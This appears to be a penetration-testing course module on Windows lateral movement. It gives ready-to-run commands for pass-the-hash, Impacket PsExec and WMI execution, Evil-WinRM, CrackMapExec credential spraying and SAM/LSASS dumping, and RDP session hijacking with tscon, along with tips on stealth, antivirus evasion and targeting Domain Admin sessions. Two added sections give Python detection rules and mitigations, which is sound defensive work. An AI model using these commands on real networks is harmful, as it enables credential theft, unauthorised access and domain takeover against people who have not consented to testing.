Lateral Movement Techniques
Pass the Hash
Protocol: NTLM / SMB
Authenticate using an NTLM hash instead of a plaintext password. No cracking required. Works against any NTLM-authenticated service.
PSExec
Protocol: SMB (TCP 445)
Deploy a service binary via SMB ADMIN$ share. Returns an interactive SYSTEM shell. Loud — creates service events in the event log.
WMI Exec
Protocol: DCOM/RPC (TCP 135)
Execute commands via Windows Management Instrumentation. Semi-interactive. Less noisy than PSExec — no service creation.
WinRM
Protocol: HTTP/HTTPS (5985/5986)
Windows Remote Management — PowerShell remoting. Clean interactive shell. Requires the target to have WinRM enabled (default on Server 2012+).
DCOM
Protocol: DCOM/RPC
Execute methods on COM objects remotely. Multiple execution vectors (MMC20, ShellWindows). Stealthy but complex.
RDP Hijacking
Protocol: RDP (TCP 3389)
Attach to disconnected RDP sessions as SYSTEM without the original user's password. Requires SYSTEM on the target.
Pass the Hash (PtH)

Authenticating with an NTLM Hash

NTLM authentication exchanges can be completed with just the password hash — the protocol was designed this way for backward compatibility. If you have a user's NTLM hash (from SAM dump, LSASS dump, or DCSync), you can authenticate as that user to any NTLM-accepting service without ever knowing the plaintext password.

This works against: SMB shares, PsExec, WMI, WinRM (in older configurations), and some web applications. It does not work for interactive GUI logons, or services that use Kerberos exclusively.

# Pass the Hash with CrackMapExec — test access
kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:<ntlm-hash>

# Get a shell via Impacket's psexec with a hash
kali@kali:~$ impacket-psexec meridianfg.local/Administrator@192.168.1.10 -hashes :<ntlm-hash>

# WMI exec with hash
kali@kali:~$ impacket-wmiexec meridianfg.local/Administrator@192.168.1.20 -hashes :<ntlm-hash>

# Evil-WinRM with hash
kali@kali:~$ evil-winrm -i 192.168.1.20 -u Administrator -H <ntlm-hash>
Pass the Hash against local Administrator accounts is blocked by UAC's remote token filtering (KB2871997) on modern Windows — only the built-in Administrator (RID 500) account is exempt. Domain accounts are unaffected by this restriction. Always prefer domain account hashes when targeting workstations.
When CME outputs Pwn3d! for a host, you have local admin access — run --sam to dump SAM hashes or --lsa to dump LSA secrets immediately. Harvested hashes from one machine can grant access to others (credential reuse is common).
Remote Execution Methods

PSExec — SMB Service-Based Shell

PSExec (Impacket's implementation) copies a randomly-named service binary to the target's ADMIN$ share, registers it as a Windows service, starts it to get a SYSTEM shell, then cleans up. It requires: local admin access, SMB (TCP 445) open, and ADMIN$ share accessible.

# With a plaintext password
kali@kali:~$ impacket-psexec meridianfg.local/administrator:Admin123!@192.168.1.20

# With an NTLM hash (Pass the Hash)
kali@kali:~$ impacket-psexec meridianfg.local/administrator@192.168.1.20 -hashes :<hash>

WMI — Stealthier Execution

Windows Management Instrumentation allows running commands via DCOM on port 135 (dynamic RPC port range for data). Less noise than PSExec — no service creation event. The output is fetched via SMB, so port 445 is still needed for interactive use.

kali@kali:~$ impacket-wmiexec meridianfg.local/administrator:Admin123!@192.168.1.20

# Use -silentcommand for no output (pure fire-and-forget)
kali@kali:~$ impacket-wmiexec meridianfg.local/administrator@192.168.1.20 -hashes :<hash> \
    "powershell -enc <b64-payload>" -silentcommand

WinRM — PowerShell Remoting

WinRM (TCP 5985 HTTP, 5986 HTTPS) provides native PowerShell remoting. Evil-WinRM is the most convenient Kali client, offering a clean interactive shell, file upload/download, and in-memory PowerShell module loading.

# Connect with credentials
kali@kali:~$ evil-winrm -i 192.168.1.20 -u administrator -p Admin123!

# Connect with hash (Pass the Hash)
kali@kali:~$ evil-winrm -i 192.168.1.20 -u administrator -H <ntlm-hash>

# Upload a file to the target
Evil-WinRM*> upload /path/to/local/file.ps1 C:\Temp\file.ps1

# Download a file from the target
Evil-WinRM*> download C:\Temp\output.txt /tmp/output.txt
CrackMapExec for Lateral Movement

Systematic Movement and Credential Spraying

CrackMapExec lets you test a credential (or hash) against your full subnet in seconds, execute commands on multiple hosts at once, and harvest further credentials from each compromised machine. It builds a picture of your lateral movement reach rapidly.

# Dump SAM hashes from all machines where you have admin
kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u administrator -H <hash> --sam

# Execute a command on all hosts where creds work
kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u administrator -p Admin123! -x "whoami /priv"

# List sessions — who else is logged in on each machine
kali@kali:~$ crackmapexec smb 192.168.1.20 -u administrator -p Admin123! --sessions

# Check for logged-in domain admins across all workstations
kali@kali:~$ crackmapexec smb 192.168.1.0/24 -u administrator -p Admin123! --loggedon-users | grep "Domain Admins"

# Dump LSASS hashes (credential harvesting)
kali@kali:~$ crackmapexec smb 192.168.1.20 -u administrator -p Admin123! -M lsassy
The lsassy module dumps LSASS in a variety of stealthy ways (procdump, comsvcs.dll, etc.) and extracts credentials without dropping a full memory dump file. It is more AV-friendly than running Mimikatz directly.
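The defender-side view of what this section and the Pass the Hash section describe, as an added example that is not part of the course notes: a hash sprayed across a subnet shows up as one account producing NTLM network logons (4624, type 3) on many hosts within seconds, and a PsExec-style run shows up as a 7045 service install with a random-letter name and binary. The event records are constructed, the field names are an assumed normalized shape, and the exact lengths of Impacket's random names are an assumption.

```python
"""Added detection example (not from the course notes): flag NTLM hash spraying
across a subnet and PsExec-style service installs. Records are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events: 4624 = logon (Security log), 7045 = service installed
EVENTS = [
    {"ts": "2024-05-01T09:00:00", "id": 4624, "host": "WS01", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.1.50"},
    {"ts": "2024-05-01T09:00:02", "id": 4624, "host": "WS02", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.1.50"},
    {"ts": "2024-05-01T09:00:03", "id": 4624, "host": "WS03", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.1.50"},
    {"ts": "2024-05-01T09:00:05", "id": 4624, "host": "WS04", "user": "administrator",
     "logon_type": 3, "auth_pkg": "NTLM", "src_ip": "192.168.1.50"},
    {"ts": "2024-05-01T09:30:00", "id": 4624, "host": "FS01", "user": "jsmith",
     "logon_type": 3, "auth_pkg": "Kerberos", "src_ip": "192.168.1.77"},
    {"ts": "2024-05-01T09:00:06", "id": 7045, "host": "WS04",
     "service": "xKqT", "image": r"%SystemRoot%\qwLmRbZs.exe"},
    {"ts": "2024-05-01T08:00:00", "id": 7045, "host": "WS01",
     "service": "Sysmon64", "image": r"C:\Windows\Sysmon64.exe"},
]

def ntlm_fanout(events, threshold=3, window=timedelta(minutes=5)):
    """(user, src_ip) pairs whose NTLM type-3 logons reach >= threshold hosts in window."""
    per_source = defaultdict(list)
    for e in events:
        if e["id"] == 4624 and e["logon_type"] == 3 and e["auth_pkg"] == "NTLM":
            per_source[(e["user"], e["src_ip"])].append(
                (datetime.fromisoformat(e["ts"]), e["host"]))
    hits = set()
    for key, logons in per_source.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            hosts = {h for t, h in logons[i:] if t - t0 <= window}
            if len(hosts) >= threshold:
                hits.add(key)
                break
    return hits

# Impacket psexec drops a service with random-letter name and binary (lengths assumed)
RANDOM_SVC = re.compile(r"^[A-Za-z]{4}$")
RANDOM_BIN = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\[A-Za-z]{8}\.exe$", re.I)

def psexec_like_installs(events):
    """Hosts where a 7045 service install looks like a dropped PsExec stub."""
    return [e["host"] for e in events if e["id"] == 7045
            and RANDOM_SVC.match(e["service"]) and RANDOM_BIN.match(e["image"])]
```

Tune the threshold and window to the environment; vulnerability scanners and backup agents also produce legitimate NTLM fan-out and should be allow-listed by source address.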
RDP Session Hijacking

Taking Over Disconnected Sessions as SYSTEM

When users disconnect from an RDP session instead of logging off, their session remains alive on the server. As SYSTEM, you can attach to any disconnected session using the built-in tscon utility — without needing the session owner's password. This is especially useful when a Domain Admin has a disconnected session on a machine you've already compromised.

# List RDP sessions on a target machine (from Kali with admin creds)
kali@kali:~$ impacket-wmiexec administrator:Admin123!@192.168.1.20 "qwinsta"

# Output example:
 SESSIONNAME       USERNAME          ID  STATE   TYPE    DEVICE
>console           administrator      0  Active  wdcon
 rdp-tcp#2         dwhite             2  Disc    rdpwd
# (dwhite is disconnected — RDP session 2)

# Hijack from an existing SYSTEM shell on the target
C:\WINDOWS\system32> tscon 2 /dest:console

After running tscon, you are dropped into dwhite's desktop — without any authentication. From there, open a PowerShell prompt: you're acting as dwhite, with all their Kerberos tickets and access rights.

RDP hijacking requires you to be running as SYSTEM on the target. If you only have local admin, first escalate to SYSTEM via PsExec -s -i cmd or through a token impersonation technique (Module 07).
Check for disconnected Domain Admin sessions on all machines via CME --loggedon-users. A DA session on a workstation is a high-priority target — hijack it to move to the DC.
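How the hijack described above looks from the detection side, as an added example that is not part of the course notes: tscon.exe is launched by SYSTEM with a /dest: argument, and the victim's session is reconnected (Security event 4778) without the 4624 logon that a genuine reconnect would produce first. The records are constructed, the field names are an assumed normalized shape, and the pairing of 4778 with a preceding 4624 on legitimate reconnects is the assumption the second rule relies on.

```python
"""Added detection example (not from the course notes): spot tscon-based RDP
session hijacking. Records are constructed sample data with assumed field names."""
from datetime import datetime, timedelta

# Constructed: 4624 = logon, 4778 = session reconnected, 4688 = process creation
EVENTS = [
    {"ts": "2024-05-01T08:10:00", "id": 4624, "user": "dwhite", "logon_type": 10},
    {"ts": "2024-05-01T08:10:01", "id": 4778, "user": "dwhite", "session": "RDP-Tcp#1"},
    {"ts": "2024-05-01T11:42:10", "id": 4688, "user": "NT AUTHORITY\\SYSTEM",
     "image": r"C:\Windows\System32\tscon.exe", "cmdline": "tscon 2 /dest:console"},
    {"ts": "2024-05-01T11:42:11", "id": 4778, "user": "dwhite", "session": "Console"},
]

def system_tscon(events):
    """tscon.exe run as SYSTEM with /dest: is the hijack primitive described in
    the notes; a user reconnecting to their own session never runs it as SYSTEM."""
    return [e for e in events if e["id"] == 4688
            and e["image"].lower().endswith("\\tscon.exe")
            and e["user"].upper().endswith("\\SYSTEM")
            and "/dest:" in e["cmdline"].lower()]

def reconnect_without_logon(events, window=timedelta(minutes=2)):
    """4778 reconnects not preceded by a 4624 for the same account inside
    `window`: the session was attached without any authentication."""
    logons = [(datetime.fromisoformat(e["ts"]), e["user"])
              for e in events if e["id"] == 4624]
    flagged = []
    for e in events:
        if e["id"] != 4778:
            continue
        t = datetime.fromisoformat(e["ts"])
        if not any(u == e["user"] and timedelta(0) <= t - lt <= window
                   for lt, u in logons):
            flagged.append(e)
    return flagged
```

The mitigation that removes the target is a Group Policy that ends disconnected sessions after a short timeout, so there is no live session left to attach to.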